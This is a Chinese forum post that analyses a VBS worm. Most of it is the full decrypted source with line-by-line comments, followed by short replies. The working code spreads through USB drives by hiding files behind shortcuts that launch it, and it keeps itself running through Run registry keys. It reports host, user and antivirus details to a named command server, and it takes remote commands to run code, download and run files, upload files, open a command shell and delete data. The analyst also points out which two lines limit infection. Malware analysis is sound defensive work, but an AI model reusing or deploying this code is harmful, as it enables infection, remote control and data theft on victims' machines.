一个VBS脚本病毒的简单分析
本帖最后由 null119 于 2014-3-18 00:52 编辑原贴地址:http://www.52pojie.cn/thread-231937-1-1.html
病毒脚本行为简单描述:
运行后,复制自身到系统"%appdata%" 目录或"%temp%"目录下,设置为隐藏+系统文件属性,写注册表,添加开机自启动,然后监视可移动磁盘,有新可移动磁盘接入后,复制病毒脚本文件到可移动磁盘根目录,加隐藏+系统属性,然后遍历可移动磁盘中的所有文件及子文件夹,将除.lnk之外的所有文件及所有子文件夹全部设置为隐藏+系统属性,然后为这些文件或文件夹创建快捷方式,但快捷方式的目标参数除了打开文件本身之外,同时还会运行病毒脚本文件,以最常见的desktop.ini 文件为例,病毒脚本为其创建的快捷方式,其目标参数为:C:\Windows\system32\cmd.exe /c start 1.vbs&start desktop.ini&exit,再接着向服务器"j2w2d.no-ip.biz"的81端口,发送消息,然后根据服务器返回消息执行病毒脚本的升级,和实现下载未知文件等等功能,以上所有动作间隔5秒重复执行,而解决方法,脚本当中自带uninstall过程!
最后说明一下,此脚本目前还仅仅只是向可移动磁盘复制病毒脚本本体,因为在感染代码的'install'过程 当中有两句if not lnkfile then exit for 和 if not lnkfolder then exit for ,不过此病毒可通过网络途径自行升级,所以可能只是病毒作者还没完全做好一些准备,只要这两句代码一注释,那么,大家懂的!
以上所有仅为个人所见,如有说明不当之处,还请多多包涵!
解密脚本+简单分析标注如下,大致的东西都知道得差不多了,所以后面的一些过程也没加注释了,有功夫的慢慢看吧:
'<[ recoder : houdini (c) skype : houdini-fx ]>
'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
host = "j2w2d.no-ip.biz"
port = 81
installdir = "%appdata%"
lnkfile = true
lnkfolder = true
'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
dim shellobj
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")
'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
installname = wscript.scriptname
'当前脚本名称(也就是脚本的文件名)
startup = shellobj.specialfolders ("startup") & "\"
'上面这句是获取开始菜单-程序文件夹的路径,再拼接上startup,即为开始菜单-程序-启动文件夹,WIN7系统为C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\'
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
’从环境变量中返回%appdata%文件夹,WIN7系统为C:\Users\Administrator\AppData\Roaming\
if not filesystemobj.folderexists(installdir) theninstalldir = shellobj.expandenvironmentstrings("%temp%") & "\"
’如果不存在%appdata%文件夹,则切换为%temp% windows临时文件夹
spliter = "<" & "|" & ">"
sleep = 5000
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce
'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
on error resume next
instance
'调用instance过程,作用为读取注册表 HKEY_LOCAL_MACHINE\software\&文件名&\根键值,如果该键不存在,则写入,根键值则根据情况写入 "true - " & date 或"false - " & date
while true
'循环体
install
'install过程就是查找连接到计算机并已经准备好的可移动磁盘,复制病毒脚本文件到该可移动磁盘中,并设置为隐藏+系统文件属性,然后将所有正常文件和子文件夹也都设置为系统+隐藏属性,并为所有正常文件和子文件夹创建快捷方式,目标参数在指向正常文件的同时指向病毒脚本
response = ""
response = post ("is-ready","")
'向网络服务器发送数据
cmd = split (response,spliter)
select case cmd (0)
'判断服务器返回参数
case "excecute"
'返回的第一个参数为"excecute" 则执行服务器返回的第二个参数
param = cmd (1)
execute param
case "update"
param = cmd (1)
oneonce.close
set oneonce =filesystemobj.opentextfile (installdir & installname ,2, false)
'以只写方式打开病毒脚本文件
oneonce.write param
'写入服务器返回的第一个参数
oneonce.close
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
'不显示批处理错误及提示信息运行病毒脚本文件
wscript.quit
case "uninstall"
'返回的第一个参数为"uninstall"时,执行install过程的逆过程
uninstall
case "send"
'返回的第一个参数为"send"时,下载并运行返回的第二个参数文件和第三个参数文件
download cmd (1),cmd (2)
case "site-send"
'返回的第一个参数为"site-send"时,下载并运行返回的第二个参数文件和第三个参数文件
sitedownloader cmd (1),cmd (2)
case "recv"
'返回的第一个参数为"recv"时,通过网络升级病毒脚本文件,即返回的第二个参数文件
param = cmd (1)
upload (param)
case"enum-driver"
post "is-enum-driver",enumdriver
case"enum-faf"
param = cmd (1)
post "is-enum-faf",enumfaf (param)
case"enum-process"
post "is-enum-process",enumprocess
case"cmd-shell"
param = cmd (1)
post "is-cmd-shell",cmdshell (param)
case"delete"
'返回的第一个参数为"delete"时,删除文件及文件夹
param = cmd (1)
deletefaf (param)
case"exit-process"
'返回的第一个参数为"exit-process"时,结束pid=param的进程
param = cmd (1)
exitprocess (param)
case"sleep"
param = cmd (1)
sleep = eval (param)
end select
wscript.sleep sleep
wend
sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon
upstart
'upstart这个过程作用就是写注册表,将脚本加入开机启动,并复制脚本文件到%appdata%或%temp%文件夹
'下面这一大段就是感染代码了
for each drive in filesystemobj.drives
'遍历所有驱动器
ifdrive.isready = true then
'当插入移动磁盘准备接受访问时,IsReady才返回 True,可理解为当插入移动磁盘,并且系统已准备好进行读写,则执行下面代码
ifdrive.freespace> 0 then
'返回驱动器可用空间值,如果大于0则
ifdrive.drivetype= 1 then
'返回驱动器的类型,如果是可移动磁盘则
filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
'复制脚本文件到可移动磁盘根目录
iffilesystemobj.fileexists (drive.path & "\" & installname)then
'如果在可移动磁盘根目录存在这个脚本文件则
filesystemobj.getfile(drive.path & "\"& installname).attributes = 2+4
'设置可移动磁盘根目录的病毒脚本文件属性为隐藏+系统文件
end if
for each file in filesystemobj.getfolder( drive.path & "\" ).Files
'遍历可移动磁盘目录下的所有文件
if not lnkfile then exit for
'如果文件不是lnkfile 则退出循环
ifinstr (file.name,".") then
'如果文件名中存在"."这个字符串,则
iflcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
'如果文件后缀后不等于"lnk",则
file.attributes = 2+4
'设置文件属性为隐藏+系统文件
ifucase (file.name) <> ucase (installname) then
’如果文件名不等于病毒脚本文件名则
filename = split(file.name,".")
'filename(0)=文件名
set lnkobj = shellobj.createshortcut (drive.path & "\"& filename (0) & ".lnk")
'在可移动磁盘根目录下创建该文件的快捷方式
lnkobj.windowstyle = 7
'设置为快捷方式使用的的窗口样式类型
lnkobj.targetpath = "cmd.exe"
'设置快捷方式的可执行文件的路径
lnkobj.workingdirectory = ""
'为快捷方式指派工作目录
lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
'设置快捷方式目标参数,该参数除了指向正常文件本身,同时还指向病毒脚本
fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
'读取注册表中该文件的图标样式并根据情况设置该快捷方式的图标
ifinstr (fileicon,",") = 0 then
lnkobj.iconlocation = file.path
else
lnkobj.iconlocation = fileicon
end if
lnkobj.save()
'保存快捷方式
end if
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
'遍历可移动磁盘中所有子文件夹
if not lnkfolder then exit for
folder.attributes = 2+4
'设置文件夹属性为隐藏+系统文件夹
foldername = folder.name
set lnkobj = shellobj.createshortcut (drive.path & "\"& foldername & ".lnk")
'为子文件夹创建快捷方式,下面代码跟上面都一样
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
ifinstr (foldericon,",") = 0 then
lnkobj.iconlocation = folder.path
else
lnkobj.iconlocation = foldericon
end if
lnkobj.save()
next
end If
end If
end if
next
err.clear
end sub
sub uninstall
'install过程的逆过程
on error resume next
dim filename
dim foldername
shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true
foreach drive in filesystemobj.drives
ifdrive.isready = true then
ifdrive.freespace> 0 then
ifdrive.drivetype= 1 then
foreach file in filesystemobj.getfolder ( drive.path & "\").files
on error resume next
ifinstr (file.name,".") then
iflcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
file.attributes = 0
ifucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
else
filesystemobj.deletefile (drive.path & "\" & file.name)
end If
else
filesystemobj.deletefile (file.path)
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
folder.attributes = 0
next
end if
end if
end if
next
wscript.quit
end sub
function post (cmd ,param)
'向网络服务器发送数据
post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function
function information
on error resume next
ifinf = "" then
inf = hwid & spliter
inf = inf& shellobj.expandenvironmentstrings("%computername%") & spliter
inf = inf& shellobj.expandenvironmentstrings("%username%") & spliter
set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set os = root.execquery ("select * from win32_operatingsystem")
for each osinfo in os
inf = inf & osinfo.caption & spliter
exit for
next
inf = inf & "plus" & spliter
inf = inf & security & spliter
inf = inf & usbspreading
information = inf
else
information = inf
end if
end function
sub upstart ()
on error resume Next
shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),"wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),"wscript.exe //B "& chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
'上面两句是写注册表,将脚本加入开机启动
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
'复制脚本文本到%appdata%或%temp%文件夹
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
'复制脚本文本到开始菜单-程序-启动文件夹
end sub
function hwid
on error resume next
set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
ifdisk.volumeserialnumber <> "" then
hwid = disk.volumeserialnumber
exit for
end if
next
end function
function security
on error resume next
security = ""
set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
forx = 1 to ubound (versionstr)
osversion = osversion &versionstr (i)
next
osversion = eval (osversion)
ifosversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
for each objantivirus in colantivirus
security= security& objantivirus.displayname & " ."
next
if security= "" then security= "nan-av"
end function
function instance
on error resume next
usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
'读取注册表 HKEY_LOCAL_MACHINE\software\&文件名&\根键值
if usbspreading = "" then
'如果不存在这个该键,则
if lcase ( mid(wscript.scriptfullname,2)) = ":\" &lcase(installname) then
'wscript.scriptfullname=当前脚本运行的完整路径,mid 取脚本完整路径的第二个字符到最后一个字符,如果这个前面获取的字符串等于":\"&lcase(installname),则执行下面两行代码,否则执行Else下面两行代码
usbspreading = "true - " & date
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)& "\",usbspreading, "REG_SZ"
'写注册表中usbspreading的这个键值,内容为 "true - " & date (date为系统日期)
else
usbspreading = "false - " & date
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)& "\",usbspreading, "REG_SZ"
end if
end If
upstart
set scriptfullnameshort =filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort =filesystemobj.getfile (installdir & installname)
iflcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
wscript.quit
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
iferr.number > 0 then wscript.quit
end function
sub sitedownloader (fileurl,filename)
'还是下载文件,参数为(下载文件URL,下载后保存的文件名)
strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send
set objfsodownload = createobject ("scripting.filesystemobject")
ifobjfsodownload.fileexists (strsaveto) then
objfsodownload.deletefile (strsaveto)
end if
if objhttpdownload.status = 200 then
dimobjstreamdownload
setobjstreamdownload = createobject("adodb.stream")
with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub
sub download (fileurl,filedir)
'下载文件函数(参数为下载文件URL,下载文件保存目录)
if filedir = "" then
filedir = installdir
end if
strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""
set objfsodownload = createobject ("scripting.filesystemobject")
ifobjfsodownload.fileexists (strsaveto) then
objfsodownload.deletefile (strsaveto)
end if
ifobjhttpdownload.status = 200 then
dimobjstreamdownload
setobjstreamdownload = createobject("adodb.stream")
with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
set objstreamdownload= nothing
end if
if objfsodownload.fileexists(strsaveto) then
shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub
function upload (fileurl)
dimhttpobj,objstreamuploade,buffer
setobjstreamuploade = createobject("adodb.stream")
with objstreamuploade
.type = 1
.open
.loadfromfile fileurl
buffer = .read
.close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function
function enumdriver ()
foreach drive in filesystemobj.drives
if drive.isready = true then
enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function
function enumfaf (enumdir)
enumfaf = enumdir & spliter
foreach folder in filesystemobj.getfolder (enumdir).subfolders
enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next
foreach file in filesystemobj.getfolder (enumdir).files
enumfaf = enumfaf & file.name & "|" & file.size& "|" & "f" & "|" & file.attributes & spliter
next
end function
function enumprocess ()
on error resume next
set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)
dim objitem
for each objitem in colitems
enumprocess = enumprocess & objitem.name & "|"
enumprocess = enumprocess & objitem.processid & "|"
enumprocess = enumprocess & objitem.executablepath & spliter
next
end function
sub exitprocess (pid)
on error resume next
shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub
sub deletefaf (url)
on error resume next
filesystemobj.deletefile url
filesystemobj.deletefolder url
end sub
function cmdshell (cmd)
dim httpobj,oexec,readallfromany
set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
readallfromany = oexec.stderr.readall
else
readallfromany = ""
end if
cmdshell = readallfromany
end function
好,学习了 膜拜大神 先收藏了,再慢慢学习
幸苦了。。 代码写的很清楚 不过vsb没学过 但是能看明白 Sreac.L 发表于 2014-1-13 09:26 static/image/common/back.gif
膜拜大神
小菜一个,不足挂齿
移动下,原帖地址贴的有问题,这个是自己帖子的连接,给下具体帖子地址看看。 膜拜,继续学习
页:
[1]
2